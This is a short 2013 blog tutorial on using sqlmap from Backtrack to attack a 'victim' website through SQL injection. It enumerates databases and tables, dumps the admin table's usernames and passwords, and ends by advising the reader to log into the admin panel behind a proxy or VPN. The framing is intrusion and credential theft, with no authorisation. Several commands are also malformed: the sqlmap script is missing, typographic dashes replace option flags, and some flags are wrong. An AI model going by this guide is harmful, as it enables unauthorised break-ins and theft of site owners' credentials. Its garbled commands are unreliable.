Sunday, 15 December 2013

Hack website using Backtrack (sqlmap)

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminalsql map 1
2. Now find the vulnerable site. (well I already have vulnerable site)
sql map 2
3. Now type this command in the terminal and hit enter.(refer above figure)
python -u http://yourvictim'slink/index.php?id=4 –dbs

4. Now you will get the database name of the website
sql map 3
Well I got the two database aj and information_schema we will select aj database.

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python -u http://www.yourvictim' -D aj –tables

sql map 4
7. Now you will get the tables list which is stored in aj database.
sql map 5

8. Now lets grab the columns from the admin table
python -u http://www.yourvictim' -T admin --columns
sql map 7
Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
python -u http://www.yourvictim' -T admin -U test --dump
Now we got the username and the password of the website !
sql map 9
Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.
Post a Comment